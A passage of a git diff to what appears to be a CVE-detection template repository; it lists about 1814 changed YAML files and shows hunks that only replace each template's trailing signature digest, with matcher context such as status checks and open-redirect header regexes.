http/cves/2023/CVE-2023-27179.yaml | 2 +- http/cves/2023/CVE-2023-27292.yaml | 2 +- http/cves/2023/CVE-2023-2732.yaml | 2 +- http/cves/2023/CVE-2023-27350.yaml | 2 +- http/cves/2023/CVE-2023-27372.yaml | 2 +- http/cves/2023/CVE-2023-27482.yaml | 2 +- http/cves/2023/CVE-2023-27524.yaml | 2 +- http/cves/2023/CVE-2023-27587.yaml | 2 +- http/cves/2023/CVE-2023-27639.yaml | 2 +- http/cves/2023/CVE-2023-27640.yaml | 2 +- http/cves/2023/CVE-2023-2766.yaml | 2 +- http/cves/2023/CVE-2023-2779.yaml | 2 +- http/cves/2023/CVE-2023-2780.yaml | 2 +- http/cves/2023/CVE-2023-27922.yaml | 2 +- http/cves/2023/CVE-2023-2796.yaml | 2 +- http/cves/2023/CVE-2023-28121.yaml | 2 +- http/cves/2023/CVE-2023-2813.yaml | 2 +- http/cves/2023/CVE-2023-2822.yaml | 2 +- http/cves/2023/CVE-2023-2825.yaml | 2 +- http/cves/2023/CVE-2023-28343.yaml | 2 +- http/cves/2023/CVE-2023-28432.yaml | 2 +- http/cves/2023/CVE-2023-28662.yaml | 2 +- http/cves/2023/CVE-2023-28665.yaml | 2 +- http/cves/2023/CVE-2023-29084.yaml | 2 +- http/cves/2023/CVE-2023-29298.yaml | 2 +- http/cves/2023/CVE-2023-29300.yaml | 2 +- http/cves/2023/CVE-2023-29357.yaml | 2 +- http/cves/2023/CVE-2023-29439.yaml | 2 +- http/cves/2023/CVE-2023-2948.yaml | 2 +- http/cves/2023/CVE-2023-29489.yaml | 2 +- http/cves/2023/CVE-2023-2949.yaml | 2 +- http/cves/2023/CVE-2023-29622.yaml | 2 +- http/cves/2023/CVE-2023-29623.yaml | 2 +- http/cves/2023/CVE-2023-2982.yaml | 2 +- http/cves/2023/CVE-2023-29827.yaml | 2 +- http/cves/2023/CVE-2023-29887.yaml | 2 +- http/cves/2023/CVE-2023-29919.yaml | 2 +- http/cves/2023/CVE-2023-29922.yaml | 2 +- http/cves/2023/CVE-2023-29923.yaml | 2 +- http/cves/2023/CVE-2023-30013.yaml | 2 +- http/cves/2023/CVE-2023-30019.yaml | 2 +- http/cves/2023/CVE-2023-30150.yaml | 2 +- http/cves/2023/CVE-2023-30210.yaml | 2 +- http/cves/2023/CVE-2023-30212.yaml | 2 +- http/cves/2023/CVE-2023-30256.yaml | 2 +- http/cves/2023/CVE-2023-30258.yaml | 2 +- http/cves/2023/CVE-2023-30534.yaml | 2 +- http/cves/2023/CVE-2023-30625.yaml | 2 +- http/cves/2023/CVE-2023-3077.yaml | 2 +- http/cves/2023/CVE-2023-30777.yaml | 2 +- http/cves/2023/CVE-2023-30868.yaml | 2 +- http/cves/2023/CVE-2023-30943.yaml | 2 +- http/cves/2023/CVE-2023-31059.yaml | 2 +- http/cves/2023/CVE-2023-31446.yaml | 2 +- http/cves/2023/CVE-2023-31465.yaml | 2 +- http/cves/2023/CVE-2023-31548.yaml | 2 +- http/cves/2023/CVE-2023-32077.yaml | 2 +- http/cves/2023/CVE-2023-3219.yaml | 2 +- http/cves/2023/CVE-2023-32243.yaml | 2 +- http/cves/2023/CVE-2023-32315.yaml | 2 +- http/cves/2023/CVE-2023-32563.yaml | 2 +- http/cves/2023/CVE-2023-33338.yaml | 2 +- http/cves/2023/CVE-2023-33405.yaml | 2 +- http/cves/2023/CVE-2023-33439.yaml | 2 +- http/cves/2023/CVE-2023-33440.yaml | 2 +- http/cves/2023/CVE-2023-3345.yaml | 2 +- http/cves/2023/CVE-2023-33510.yaml | 2 +- http/cves/2023/CVE-2023-33568.yaml | 2 +- http/cves/2023/CVE-2023-33584.yaml | 2 +- http/cves/2023/CVE-2023-33629.yaml | 2 +- http/cves/2023/CVE-2023-3368.yaml | 2 +- http/cves/2023/CVE-2023-33831.yaml | 2 +- http/cves/2023/CVE-2023-34020.yaml | 2 +- http/cves/2023/CVE-2023-34124.yaml | 2 +- http/cves/2023/CVE-2023-34259.yaml | 2 +- http/cves/2023/CVE-2023-34362.yaml | 2 +- http/cves/2023/CVE-2023-34537.yaml | 2 +- http/cves/2023/CVE-2023-34598.yaml | 2 +- http/cves/2023/CVE-2023-34599.yaml | 2 +- http/cves/2023/CVE-2023-3460.yaml | 2 +- http/cves/2023/CVE-2023-34659.yaml | 2 +- http/cves/2023/CVE-2023-34751.yaml | 2 +- http/cves/2023/CVE-2023-34752.yaml | 2 +- http/cves/2023/CVE-2023-34753.yaml | 2 +- http/cves/2023/CVE-2023-34755.yaml | 2 +- http/cves/2023/CVE-2023-34756.yaml | 2 +- http/cves/2023/CVE-2023-3479.yaml | 2 +- http/cves/2023/CVE-2023-34843.yaml | 2 +- http/cves/2023/CVE-2023-34960.yaml | 2 +- http/cves/2023/CVE-2023-34993.yaml | 2 +- http/cves/2023/CVE-2023-35078.yaml | 2 +- http/cves/2023/CVE-2023-35082.yaml | 2 +- http/cves/2023/CVE-2023-35158.yaml | 2 +- http/cves/2023/CVE-2023-35813.yaml | 2 +- http/cves/2023/CVE-2023-35843.yaml | 2 +- http/cves/2023/CVE-2023-35844.yaml | 2 +- http/cves/2023/CVE-2023-35885.yaml | 2 +- http/cves/2023/CVE-2023-36144.yaml | 2 +- http/cves/2023/CVE-2023-36284.yaml | 2 +- http/cves/2023/CVE-2023-36287.yaml | 2 +- http/cves/2023/CVE-2023-36289.yaml | 2 +- http/cves/2023/CVE-2023-36306.yaml | 2 +- http/cves/2023/CVE-2023-36346.yaml | 2 +- http/cves/2023/CVE-2023-36347.yaml | 2 +- http/cves/2023/CVE-2023-36844.yaml | 2 +- http/cves/2023/CVE-2023-36845.yaml | 2 +- http/cves/2023/CVE-2023-36934.yaml | 2 +- http/cves/2023/CVE-2023-3710.yaml | 2 +- http/cves/2023/CVE-2023-37265.yaml | 2 +- http/cves/2023/CVE-2023-37266.yaml | 2 +- http/cves/2023/CVE-2023-37270.yaml | 2 +- http/cves/2023/CVE-2023-37462.yaml | 2 +- http/cves/2023/CVE-2023-37474.yaml | 2 +- http/cves/2023/CVE-2023-37580.yaml | 2 +- http/cves/2023/CVE-2023-37629.yaml | 2 +- http/cves/2023/CVE-2023-3765.yaml | 2 +- http/cves/2023/CVE-2023-37679.yaml | 2 +- http/cves/2023/CVE-2023-37728.yaml | 2 +- http/cves/2023/CVE-2023-37979.yaml | 2 +- http/cves/2023/CVE-2023-38035.yaml | 2 +- http/cves/2023/CVE-2023-38203.yaml | 2 +- http/cves/2023/CVE-2023-38205.yaml | 2 +- http/cves/2023/CVE-2023-3836.yaml | 2 +- http/cves/2023/CVE-2023-3843.yaml | 2 +- http/cves/2023/CVE-2023-38433.yaml | 2 +- http/cves/2023/CVE-2023-3845.yaml | 2 +- http/cves/2023/CVE-2023-3847.yaml | 2 +- http/cves/2023/CVE-2023-3848.yaml | 2 +- http/cves/2023/CVE-2023-3849.yaml | 2 +- http/cves/2023/CVE-2023-38501.yaml | 2 +- http/cves/2023/CVE-2023-38646.yaml | 2 +- http/cves/2023/CVE-2023-38964.yaml | 2 +- http/cves/2023/CVE-2023-39002.yaml | 2 +- http/cves/2023/CVE-2023-39026.yaml | 2 +- http/cves/2023/CVE-2023-39108.yaml | 2 +- http/cves/2023/CVE-2023-39109.yaml | 2 +- http/cves/2023/CVE-2023-39110.yaml | 2 +- http/cves/2023/CVE-2023-39141.yaml | 2 +- http/cves/2023/CVE-2023-39143.yaml | 2 +- http/cves/2023/CVE-2023-3936.yaml | 2 +- http/cves/2023/CVE-2023-39361.yaml | 2 +- http/cves/2023/CVE-2023-39598.yaml | 2 +- http/cves/2023/CVE-2023-39600.yaml | 2 +- http/cves/2023/CVE-2023-39676.yaml | 2 +- http/cves/2023/CVE-2023-39677.yaml | 2 +- http/cves/2023/CVE-2023-39700.yaml | 2 +- http/cves/2023/CVE-2023-39796.yaml | 2 +- http/cves/2023/CVE-2023-40208.yaml | 2 +- http/cves/2023/CVE-2023-40355.yaml | 2 +- http/cves/2023/CVE-2023-40779.yaml | 2 +- http/cves/2023/CVE-2023-4110.yaml | 2 +- http/cves/2023/CVE-2023-41109.yaml | 2 +- http/cves/2023/CVE-2023-4111.yaml | 2 +- http/cves/2023/CVE-2023-4112.yaml | 2 +- http/cves/2023/CVE-2023-4113.yaml | 2 +- http/cves/2023/CVE-2023-4114.yaml | 2 +- http/cves/2023/CVE-2023-4115.yaml | 2 +- http/cves/2023/CVE-2023-4116.yaml | 2 +- http/cves/2023/CVE-2023-41265.yaml | 2 +- http/cves/2023/CVE-2023-41266.yaml | 2 +- http/cves/2023/CVE-2023-4148.yaml | 2 +- http/cves/2023/CVE-2023-41538.yaml | 2 +- http/cves/2023/CVE-2023-41642.yaml | 2 +- http/cves/2023/CVE-2023-4168.yaml | 2 +- http/cves/2023/CVE-2023-4169.yaml | 2 +- http/cves/2023/CVE-2023-4173.yaml | 2 +- http/cves/2023/CVE-2023-4174.yaml | 2 +- http/cves/2023/CVE-2023-41763.yaml | 2 +- http/cves/2023/CVE-2023-41892.yaml | 2 +- http/cves/2023/CVE-2023-42442.yaml | 2 +- http/cves/2023/CVE-2023-42793.yaml | 2 +- http/cves/2023/CVE-2023-43177.yaml | 2 +- http/cves/2023/CVE-2023-43187.yaml | 2 +- http/cves/2023/CVE-2023-43208.yaml | 2 +- http/cves/2023/CVE-2023-43261.yaml | 2 +- http/cves/2023/CVE-2023-43325.yaml | 2 +- http/cves/2023/CVE-2023-43326.yaml | 2 +- http/cves/2023/CVE-2023-43374.yaml | 2 +- http/cves/2023/CVE-2023-43795.yaml | 2 +- http/cves/2023/CVE-2023-4415.yaml | 2 +- http/cves/2023/CVE-2023-44352.yaml | 2 +- http/cves/2023/CVE-2023-44353.yaml | 2 +- http/cves/2023/CVE-2023-4451.yaml | 2 +- http/cves/2023/CVE-2023-44812.yaml | 2 +- http/cves/2023/CVE-2023-44813.yaml | 2 +- http/cves/2023/CVE-2023-4521.yaml | 2 +- http/cves/2023/CVE-2023-45375.yaml | 2 +- http/cves/2023/CVE-2023-4542.yaml | 2 +- http/cves/2023/CVE-2023-4547.yaml | 2 +- http/cves/2023/CVE-2023-45542.yaml | 2 +- http/cves/2023/CVE-2023-45671.yaml | 2 +- http/cves/2023/CVE-2023-4568.yaml | 2 +- http/cves/2023/CVE-2023-45852.yaml | 2 +- http/cves/2023/CVE-2023-45855.yaml | 2 +- http/cves/2023/CVE-2023-4596.yaml | 2 +- http/cves/2023/CVE-2023-4634.yaml | 2 +- http/cves/2023/CVE-2023-46347.yaml | 2 +- http/cves/2023/CVE-2023-46359.yaml | 2 +- http/cves/2023/CVE-2023-46574.yaml | 2 +- http/cves/2023/CVE-2023-46747.yaml | 2 +- http/cves/2023/CVE-2023-46805.yaml | 2 +- http/cves/2023/CVE-2023-4714.yaml | 2 +- http/cves/2023/CVE-2023-47211.yaml | 2 +- http/cves/2023/CVE-2023-47218.yaml | 2 +- http/cves/2023/CVE-2023-47246.yaml | 2 +- http/cves/2023/CVE-2023-47643.yaml | 2 +- http/cves/2023/CVE-2023-48084.yaml | 2 +- http/cves/2023/CVE-2023-49070.yaml | 2 +- http/cves/2023/CVE-2023-49103.yaml | 2 +- http/cves/2023/CVE-2023-4966.yaml | 2 +- http/cves/2023/CVE-2023-4973.yaml | 2 +- http/cves/2023/CVE-2023-4974.yaml | 2 +- http/cves/2023/CVE-2023-49785.yaml | 2 +- http/cves/2023/CVE-2023-5003.yaml | 2 +- http/cves/2023/CVE-2023-50290.yaml | 2 +- http/cves/2023/CVE-2023-5074.yaml | 2 +- http/cves/2023/CVE-2023-5089.yaml | 2 +- http/cves/2023/CVE-2023-50917.yaml | 2 +- http/cves/2023/CVE-2023-50968.yaml | 2 +- http/cves/2023/CVE-2023-51467.yaml | 2 +- http/cves/2023/CVE-2023-52085.yaml | 2 +- http/cves/2023/CVE-2023-5244.yaml | 2 +- http/cves/2023/CVE-2023-5360.yaml | 2 +- http/cves/2023/CVE-2023-5375.yaml | 2 +- http/cves/2023/CVE-2023-5556.yaml | 2 +- http/cves/2023/CVE-2023-5830.yaml | 2 +- http/cves/2023/CVE-2023-5914.yaml | 2 +- http/cves/2023/CVE-2023-5991.yaml | 2 +- http/cves/2023/CVE-2023-6018.yaml | 2 +- http/cves/2023/CVE-2023-6020.yaml | 2 +- http/cves/2023/CVE-2023-6021.yaml | 2 +- http/cves/2023/CVE-2023-6023.yaml | 2 +- http/cves/2023/CVE-2023-6038.yaml | 2 +- http/cves/2023/CVE-2023-6063.yaml | 2 +- http/cves/2023/CVE-2023-6065.yaml | 2 +- http/cves/2023/CVE-2023-6114.yaml | 2 +- http/cves/2023/CVE-2023-6360.yaml | 2 +- http/cves/2023/CVE-2023-6379.yaml | 2 +- http/cves/2023/CVE-2023-6380.yaml | 2 +- http/cves/2023/CVE-2023-6389.yaml | 2 +- http/cves/2023/CVE-2023-6553.yaml | 2 +- http/cves/2023/CVE-2023-6567.yaml | 2 +- http/cves/2023/CVE-2023-6623.yaml | 2 +- http/cves/2023/CVE-2023-6634.yaml | 2 +- http/cves/2023/CVE-2023-6831.yaml | 2 +- http/cves/2023/CVE-2023-6875.yaml | 2 +- http/cves/2023/CVE-2023-6895.yaml | 2 +- http/cves/2023/CVE-2023-6909.yaml | 2 +- http/cves/2023/CVE-2023-6977.yaml | 2 +- http/cves/2023/CVE-2023-6989.yaml | 2 +- http/cves/2023/CVE-2023-7028.yaml | 2 +- http/cves/2024/CVE-2024-0195.yaml | 2 +- http/cves/2024/CVE-2024-0200.yaml | 2 +- http/cves/2024/CVE-2024-0204.yaml | 2 +- http/cves/2024/CVE-2024-0235.yaml | 2 +- http/cves/2024/CVE-2024-0305.yaml | 2 +- http/cves/2024/CVE-2024-0337.yaml | 2 +- http/cves/2024/CVE-2024-0352.yaml | 2 +- http/cves/2024/CVE-2024-0713.yaml | 2 +- http/cves/2024/CVE-2024-1021.yaml | 2 +- http/cves/2024/CVE-2024-1071.yaml | 2 +- http/cves/2024/CVE-2024-1208.yaml | 2 +- http/cves/2024/CVE-2024-1209.yaml | 2 +- http/cves/2024/CVE-2024-1210.yaml | 2 +- http/cves/2024/CVE-2024-1561.yaml | 2 +- http/cves/2024/CVE-2024-1709.yaml | 2 +- http/cves/2024/CVE-2024-20767.yaml | 2 +- http/cves/2024/CVE-2024-21644.yaml | 2 +- http/cves/2024/CVE-2024-21645.yaml | 2 +- http/cves/2024/CVE-2024-21683.yaml | 2 +- http/cves/2024/CVE-2024-21887.yaml | 2 +- http/cves/2024/CVE-2024-21893.yaml | 2 +- http/cves/2024/CVE-2024-22024.yaml | 2 +- http/cves/2024/CVE-2024-22319.yaml | 2 +- http/cves/2024/CVE-2024-22927.yaml | 2 +- http/cves/2024/CVE-2024-2340.yaml | 2 +- http/cves/2024/CVE-2024-23917.yaml | 2 +- http/cves/2024/CVE-2024-24131.yaml | 2 +- http/cves/2024/CVE-2024-24919.yaml | 2 +- http/cves/2024/CVE-2024-25735.yaml | 2 +- http/cves/2024/CVE-2024-26331.yaml | 2 +- http/cves/2024/CVE-2024-27198.yaml | 2 +- http/cves/2024/CVE-2024-27956.yaml | 2 +- http/cves/2024/CVE-2024-28255.yaml | 2 +- http/cves/2024/CVE-2024-28734.yaml | 2 +- http/cves/2024/CVE-2024-2879.yaml | 2 +- http/cves/2024/CVE-2024-29059.yaml | 2 +- http/cves/2024/CVE-2024-29269.yaml | 2 +- http/cves/2024/CVE-2024-3097.yaml | 2 +- http/cves/2024/CVE-2024-3136.yaml | 2 +- http/cves/2024/CVE-2024-31848.yaml | 2 +- http/cves/2024/CVE-2024-31849.yaml | 2 +- http/cves/2024/CVE-2024-31850.yaml | 2 +- http/cves/2024/CVE-2024-32399.yaml | 2 +- http/cves/2024/CVE-2024-3273.yaml | 2 +- http/cves/2024/CVE-2024-33575.yaml | 2 +- http/cves/2024/CVE-2024-33724.yaml | 2 +- http/cves/2024/CVE-2024-3400.yaml | 2 +- http/cves/2024/CVE-2024-4040.yaml | 2 +- http/cves/2024/CVE-2024-4348.yaml | 2 +- 1814 files changed, 1814 insertions(+), 1814 deletions(-) diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml index 721f26cc51..913da2da7b 100644 --- a/http/cves/2000/CVE-2000-0114.yaml +++ b/http/cves/2000/CVE-2000-0114.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f18bd6804b42bce98cc02cea3261854e17f9d58bcb7034e2dc7289c456c57c0d022100d91840b613c0b2544a15e2ae802e176fea630dee4788fe64c5e40f9082bc1374:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205feaaedc7212d5546b4a1e2b1f6d701d77390a9a19a31d6f45a9150b0da0080a02203ffb16ad768f80c2d873647321189e4c6fa3eff77f84fbc18a3d04d5b7c714f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index b05800361d..8470e08000 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201530427f983f1ac47d92a3e00fb141fab33efd4f9ac109b29beca3488669ca5b022100e7ab1cc3fec5da235092a57848d0f83403d81bff12d5ed347ee7d6442b19444c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dcd27cbb0d1546b2d94f702f5298cdf445b5fcea29d9741ab30cdedd59749c2f022009e09962e874a528aea693b7c0c3984cf75ac175451d01bf66ae6a6d6d9f7e75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index 872aa5b0f5..0422de46ab 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200f73612464ffbb40fb37890f6902c59fd670a8c57eb10a297b6ce6d7d7a68301022100a8ed74ff2523575fbbdb8d5a4a330d69c6a96ef8d97d911a20c1468dfa92aa2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022079f74e17066a8030a2ff5a3ea6fa4258ba6ec59353823c400a4f933c88b091020220765e9a7f5973726aebe82162e0dc3565fd9f7f6fa15e4f417d5bdd2c0696de1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml index 6da7d480f3..bed100152f 100644 --- a/http/cves/2004/CVE-2004-1965.yaml +++ b/http/cves/2004/CVE-2004-1965.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a0047304502200942a34b2650323617b6c0a05aed0e60c5452d3b77477cfa2760dd51678d7371022100cf0d486cba6f8042c311e7cc3134723dd8e8b86ff44b5cdb22e0adbfe3ba3776:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ed72c7aac1f09f263022943f85c3438ab7bc9d157d128cbef2639c033ff4162802207254eabebe6585d83a8abb17a6163edc0de13410f5bfc937fda5bd940a22f36e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml index 18423be5d9..5bf2bf72f8 100644 --- a/http/cves/2005/CVE-2005-3344.yaml +++ b/http/cves/2005/CVE-2005-3344.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200f6ab7e5b811ae50b7feb5a05fd7996c735219dbe8a152b9c4cfd263af7405d6022054184a20298d9717f3c6263e0ca1083caa2941df71af109b0f69013ab683cec8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b73417184338a145cd434067c3a5affab5f19d715ddcf840193794038d2fe9fc022100ad8926c7c03251c1cf3ed73d9a65bb5c3bee39ea572aad309043f945c6e6f935:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index 0096019484..cf64ff3ab9 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -43,4 +43,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4b0a004830460221009b702e9a18c644f2a8ddd637cd2d87e35e59ec9159e4726e5b9dbf6cbe27ddcc022100e7fd499cc594ceab440e9188af24fd6eaa6f1eab4514609586796ae41b96b43f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220782d2b8bf481a5915e9c1718c67324b49b8433b1210b910742cd305d0111df63022100840add217ef0fb886c242f1eb329ce349c23c94430c6ec8a74e9f1c887447cc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index e395c6e2c0..4cc42895e6 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204e83bd6e716c336c1660d900f8c08653ace9865180909e88dc35b6180af0634d02205959ac5c89fa3aa04db1f64a614848f8a84c0604fe7f72bad1f63b1c99d8404b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022046dd195f5bf5c276dfb90ef3d9f60f781ae43dab2e02f44963a570ff60e6ea73022001f681cdc292f9f50598231358201650a5333381d856d0c35452e7a9acd3f29a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml index 6c0e74c380..6035d8bab5 100644 --- a/http/cves/2007/CVE-2007-0885.yaml +++ b/http/cves/2007/CVE-2007-0885.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200ed59822b672884f4e50ef40df983fb0862418cede91f6dc96f764425e4bf4e302205b376b90e98b64ced2421151d9636a14d0dd0830c2dee682c77cda12c602e7f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205ece81e3272a6b93437d5876ec0f1346da324d72a43381b3fd9caca99c4051ad022100e4e03ce4d101a0b9f4fb82a0e85ad58d1ee55d277fb6a190888bb16b1dddb1c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-3010.yaml b/http/cves/2007/CVE-2007-3010.yaml index df6e5d5321..913a3cbfcd 100644 --- a/http/cves/2007/CVE-2007-3010.yaml +++ b/http/cves/2007/CVE-2007-3010.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100860fb5fb6459c546fd88f49a316826632cf5a5f32bc9e9a5ce27dce40d150997022100b0b9ecb0467a3de0631a06e2e867b73844a98e132eef931105650d75e196e26f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022077daea5464ae2c99ee724324391edfccb837ce48fc24759bfc0a8aff476eefe8022063a85e8dfe57da9183ac569780803037bd4ac032588a70173d036f1660ae7caa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index 90debd42bc..08115cea39 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207688a03699896a3d8c9a6254539a13ace8813096112296d102ca74fc45a0f17b022036a518c6e517befe270990e5d1a9d992f8b19f1fa36086546a11b544ff84c692:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fa8b85892e423c5bf35a3d7e57c7a6c92369087bccf959a8ad7952dc814ddd64022100e94750ab323e456ccb7dc737ab126a2d5c160b7190e3e70993be80dd1064a3b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index baf5a3a9e8..10f8f1198a 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022037e628251b17abd8fa644b564dab5c21ed475158752e510f311df96b9d63497402201bb1673e45a11edc53bdf0a83147c1a87a74c36358ede8fe0f576850c4d4900b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203c4a8474be81263c4f0abab1f0fe57a6779f4cb1d748445fd08dc0dfab5c7131022060ca2bf20c392063d8c3f8c9e03e130f0aec84067f9af1e94c168c914dc21f7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index b69164999f..45c71789e7 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022070fd863c2346a1262a1c6a87c2bf86b8a29a953f0bb6e8e24b6988aef07dcdde022100de1eb0f49138ab29c4ba04a2020fb9075ad7b3e9c9f82629d21eee375c325b40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100be74cafeaf1d2052ae0a174926f0ffe1b73654dc73480253d26a6251d5a9f639022008e2f87389adf996c0386c4484fc3c007a8584f746fd2fc854c5d12bcd997ff1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index a08f7e1a9d..929c258686 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220777bd4294b2dc57575646d8dc88fd119dc51c0d25f2086f36a7cdefefe5647e7022100df472d5c3da8f1e15e7c99529215af99987384e58c92d925163f10813a236e5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009752c4040553333fe8225f67c3bc673afda408ff88de0319cd2b4a0bd4e7333f0220229dc9371a4b7635f2215c334754bca5387a8624d5a5f7f9476a21049803b04b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index 74805a9031..1b24dd80bf 100644 --- a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -45,4 +45,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a00483046022100add61103f83105e6e0184e371a84b94bef42e3e534eec0ba3c444c81e603b7df022100c59d3962095aa5e3dc9897e04b109f9407889fe544bd9737d9675a3b767dc339:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210080e5ce4002e9f78ace8bc34bbc70638c4d349900438da431a2757afcb531657002203ab47f7e35668fdae30c9a1dd0dabb91bae39cfafb7a502764f1517d3e3aa8e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index ba625d56d3..005162de9f 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e337afcba9ba8a3b54040f339305e5467dbb5fda18b50da4f493484a5c5182d2022100e24c3017a7abcd267ab66ab6e255d1ed5ea56d71492bcb6afd58d3a093e618c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022003b63e7cd7ab09897735b1866b0ce2b3aedc493e01965112604d9981a58d09fe02200db2d75ecbfa5669fc8cc988fcf93ee338fa4d396b07f4d60bb219df3cd58bc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml index 05e6784266..5b784a3beb 100644 --- a/http/cves/2008/CVE-2008-4764.yaml +++ b/http/cves/2008/CVE-2008-4764.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220233b1d67c643f2b04cc98635c1308c7fc6957ca19112156b50312a3c02301dd7022062edfca4c36a26a476f2dcbf466e092d2e1d048bd645dff71dbb23bb91ff5af5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210083dfc3a90c4bb3aaa2d1d85bd0eb23154e4019210fc591e51f0bded1afc7a70202205d2c129a1bb23b903372e64284d8830eabe2e9eb96e0eb5afa05c6d444afc686:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index dd7008fd98..71ba384ff2 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 